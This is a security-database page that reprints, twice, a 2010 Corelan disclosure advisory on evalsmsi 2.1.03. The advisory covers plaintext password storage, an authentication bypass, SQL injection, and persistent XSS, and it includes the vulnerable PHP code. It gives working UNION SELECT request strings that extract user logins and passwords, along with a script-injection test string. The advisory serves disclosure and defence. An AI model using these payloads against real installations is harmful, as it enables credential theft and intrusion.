|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7016 CVE : CVE-2010-0614 CVE : CVE-2010-0615 CVE : CVE-2010-0616 CWE : CWE-89 CWE : CWE-79 CWE : CWE-255 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : Yes Exploit Available : No Credit : Peter Van Eeckhoutte Published : 14.02.2010
Advisory Content : |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security (at) corelan (dot) be [email concealed] | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------| Advisory : CORELAN-10-008 Disclosure date : February 4th, 2010 0x00 : Vulnerability information -------------------------------- [*] Product : evalsmsi [*] Version : 2.1.03 [*] URL : http://sourceforge.net/projects/evalsmsi/ [*] Platform : PHP/MySQL [*] Type of vulnerability : SQL Injection, Authentication Bypass, Cross-Site Scripting [*] Risk rating : High [*] Issue fixed in version : 2.2.00 [*] Vulnerability discovered by : ekse [*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT, sinn3r, Jacky & jnz 0x01 : Vendor description of software ------------------------------------- From the vendor website: "evalSMSI is a web application, developed in PHP / MySQL, to evaluate the Information Security Management System for some entities." 0x02 : Vulnerability details ---------------------------- evalsmsi 2.1.03 contains multiple vulnerabilities. 1 - Insecure storage of password The passwords are stored in plaintext in the database. table : authentification column: password 2 - Authentication Bypass While a valid username and password is needed to access the application, it is possible to make requests via ajax.php. It doesn't give access to much interesting information but the lack of authentication augments the risks associated with the following vulnerabilities. 3 - SQL Injection SQL injection is possible via the script ajax.php The vulnerable code is the following (ajax.php, line 5): $id = $_GET['query']; $action = $_GET['action']; $base = evalsmsiConnect(); switch ($action) { case 'sub_par': $request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id""; break; case 'question': $request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id""; break; case 'num_quest': $request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id""; break; default: break; As a proof-of-concept, it is possible to obtain the username and password (in plaintext) of the first user with the following requests : first user name http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SEL ECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM% 20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%2 0%22 first user password http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SEL ECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM% 20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%2 0%22 4 - Persistent Cross-Site Scripting It is possible to inject Javascript in the comment box of reports. Normally this would be less critical because you need a valid account to access reports. However, due the preceding vulnerabilities it is possible to obtain valid credentials. As a proof of concept, the following string can be inserted in the comment box : </textarea><script>alert('XSS found by Corelan Team');</script> 0x03 : Vendor communication --------------------------- [*] January 14th, 2010 - First contact [*] January 15th, 2010 - Vendor acknowledges the problems [*] January 20th, 2010 - Update request [*] February 1st, 2010 - Vendor update [*] February 4th, 2010 - Version 2.2.00 released Please note that the passwords are still stored in plaintext in the database with this release, yet the fix for the SQL Injection and authentication bypass are greatly lowering the risks. We wish to thank Michel Dubois for his cooperation in fixing the bugs we reported in a timely manner. This transmission is intended only for use by the intended recipient(s). If you are not an intended recipient you should not read, disclose, copy, circulate or in any other way use the information contained in this transmission. The information contained in this transmission may be confidential and/or privileged. If you have received this transmission in error, please notify the sender immediately and delete this transmission including any attachments. |------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security (at) corelan (dot) be [email concealed] | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------| Advisory : CORELAN-10-008 Disclosure date : February 4th, 2010 0x00 : Vulnerability information -------------------------------- [*] Product : evalsmsi [*] Version : 2.1.03 [*] URL : http://sourceforge.net/projects/evalsmsi/ [*] Platform : PHP/MySQL [*] Type of vulnerability : SQL Injection, Authentication Bypass, Cross-Site Scripting [*] Risk rating : High [*] Issue fixed in version : 2.2.00 [*] Vulnerability discovered by : ekse [*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT, sinn3r, Jacky & jnz 0x01 : Vendor description of software ------------------------------------- From the vendor website: "evalSMSI is a web application, developed in PHP / MySQL, to evaluate the Information Security Management System for some entities." 0x02 : Vulnerability details ---------------------------- evalsmsi 2.1.03 contains multiple vulnerabilities. 1 - Insecure storage of password The passwords are stored in plaintext in the database. table : authentification column: password 2 - Authentication Bypass While a valid username and password is needed to access the application, it is possible to make requests via ajax.php. It doesn't give access to much interesting information but the lack of authentication augments the risks associated with the following vulnerabilities. 3 - SQL Injection SQL injection is possible via the script ajax.php The vulnerable code is the following (ajax.php, line 5): $id = $_GET['query']; $action = $_GET['action']; $base = evalsmsiConnect(); switch ($action) { case 'sub_par': $request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id""; break; case 'question': $request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id""; break; case 'num_quest': $request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id""; break; default: break; As a proof-of-concept, it is possible to obtain the username and password (in plaintext) of the first user with the following requests : first user name http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SEL ECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification %20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 first user password http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SEL ECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentificat ion%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 4 - Persistent Cross-Site Scripting It is possible to inject Javascript in the comment box of reports. Normally this would be less critical because you need a valid account to access reports. However, due the preceding vulnerabilities it is possible to obtain valid credentials. As a proof of concept, the following string can be inserted in the comment box : </textarea><script>alert('XSS found by Corelan Team');</script> 0x03 : Vendor communication --------------------------- [*] January 14th, 2010 - First contact [*] January 15th, 2010 - Vendor acknowledges the problems [*] January 20th, 2010 - Update request [*] February 1st, 2010 - Vendor update [*] February 4th, 2010 - Version 2.2.00 released Please note that the passwords are still stored in plaintext in the database with this release, yet the fix for the SQL Injection and authentication bypass are greatly lowering the risks. We wish to thank Michel Dubois for his cooperation in fixing the bugs we reported in a timely manner. References : http://www.securityfocus.com/bid/38116
http://www.securityfocus.com/archive/1/archive/1/509370/100/0/threaded
http://www.osvdb.org/62180
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-008-evalmsi-2-1-03-multiple-vulnerabilities/
http://secunia.com/advisories/38478
http://packetstormsecurity.org/1002-exploits/corelan-10-008-evalmsi.txt  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |